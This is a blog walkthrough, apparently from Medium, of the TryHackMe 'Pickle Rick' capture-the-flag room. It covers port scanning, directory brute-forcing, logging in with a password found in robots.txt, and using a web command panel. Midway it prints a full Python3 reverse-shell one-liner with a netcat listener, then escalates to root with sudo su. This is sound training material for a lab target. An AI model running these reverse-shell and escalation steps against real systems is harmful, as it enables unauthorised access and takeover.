Pickle Rick Walkthrough TryHackMe

Room link : https://tryhackme.com/room/picklerick

Pickle Rick

As always we need to enumerate the services running on the machine. Let’s start with a nmap scan on the machine

nmap IP -sV -T4

IP : IP address of the machine
-sV : Enable service detection
-T4 : Make the scan faster

$ nmap IP -sV -T4Starting Nmap 7.91 ( https://nmap.org ) at 2021–06–27 11:17 EDT
Nmap scan report for IP
Host is up (0.39s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.24 seconds

Now we know there are 2 open ports running 22 and 80.

22 runs SSH
80 runs HTTP

Let’s visit port 80. (Webserver)

Website

Checking the page source we find a interesting username.

Page Source

Let’s use dirsearch to find all the sub directories.

sudo dirsearch -u http://IP -x 404,403 -t 200

-u : URL to brute
-x : Hide specific status codes
-t : Specify the number of threads

[11:27:52] 301–311B — /assets -> http://10.10.73.35/assets/
[11:27:53] 200–2KB — /assets/
[11:27:58] 200–1KB — /index.html
[11:28:00] 200–882B — /login.php
[11:28:05] 200–17B — /robots.txt

Lets visit /robots.txt

$ curl http://10.10.73.35/robots.txt
Wu....dub

We find a weird text. Maybe this is a password?
Let’s try that in the /login.php page.

login.php

We can successfully login using those credentials.

After logging in we can see this page

Command Panel

Let’s try to use the ls -la command to list all the files.

Files

We can see a lot of files. Now we can try to get a reverse shell on the machine using a python reverse shell.

Firstly let’s check if the machine has python or python3. We can check that by using which python or which python3

which python3

We can see that it has python3 installed. So let’s use a python3 reverse shell.

On the attackers machine lets set up a netcat listener using : nc -lvnp 1337
You can specify any port, I like to use the port 1337

You can find the reverse shell code here → https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

PayloadsAllTheThings

Click on Python

revshell code

(Remember to change python in the beginning to python3 as the machine has python3 installed.)
Copy that reverse shell code and use any text edittor to change the IP address to your tun0 IP (ifconfig tun0) and the port you set for listening the reverse connection in netcat. (We specified 1337)

So the code would look like this for me (I have changed python to python3, port to 1337 and IP to the IP address of my tun0 interface)

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“yourtun0ip”,1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’

Let’s paste this in the command execution panel.

Make sure to set up the listener nc -lvnp 1337

Rev shell success

Now lets look at the contents of Sup3rS3cretPickl3Ingred.txt.

www-data@ip-10–10–180–175:/var/www/html$ cat Sup3rS3cretPickl3Ingred.txt
cat Sup3rS3cretPickl3Ingred.txt
mr. ........ hair

This gives us the answer for the first question : What is the first ingredient Rick needs?

Let’s look at the clue.txt file.

www-data@ip-10–10–180–175:/var/www/html$ cat clue.txt
cat clue.txt
Look around the file system for the other ingredient.

I first went to the /home directory where we found 2 users rick and ubuntu.

www-data@ip-10–10–180–175:/home$ ls 
ls
rick ubuntu

Browsing in rick’s directory we find the second ingredient.

second ingredients

The contents of the file answers the second question : Whats the second ingredient Rick needs?

Remeber to use ”” because the name of the file is 2 words. Else you will get an error like this.

cat error

cat “second ingredients”

www-data@ip-10–10–180–175:/home/rick$ cat “second ingredients”
cat “second ingredients”
1 ..... tear

Now for the final task.
I got a hint that the final answer is hidden in the /root directory.

www-data@ip-10–10–180–175:/home/rick$ cd /root
cd /root
bash: cd: /root: Permission denied

We get a permission denied error, so let’s escalate to the root user.

The most common way is to check the sudo rights of the user using the sudo -l command.

sudo -l

We can run any command with sudo to get root user access
Let’s run sudo su. This will give us the root shell

sudo su

Let’s browse the /root directory and get the answer to task 3 : Whats the final ingredient Rick needs?

3rd.txt

Well done! We have solved the room!!

Hope you enjoyed the writeup!

--

--

--

Hi, I’m Aksheet. Interested in Cyber Security and Aviation. eJPT certified

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Automate Coverage Reports in Pull Requests with Bitbucket, Jenkins and SonarCloud — Bitbucket

How to Build Highly Available Kubernetes Clusters on AWS | K8s Series By M. Sharma (On-Demand)

Implementing Your Own Operating System

AWS Lambda Functions powered by AWS Graviton2 Processors (Java, CDK)

The Importance of IT Infrastructure Management

Taking Java In

Testing Swift code with SKProduct

How we achieved test automation at Bijak

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Aksheet V

Aksheet V

Hi, I’m Aksheet. Interested in Cyber Security and Aviation. eJPT certified

More from Medium

HTB:Chatterbox Walkthrough

Toorcon CTF: Damn Files

TryHackMe|Smag Grotto — Writeup

Road to OSCP 11: Blocky HackTheBox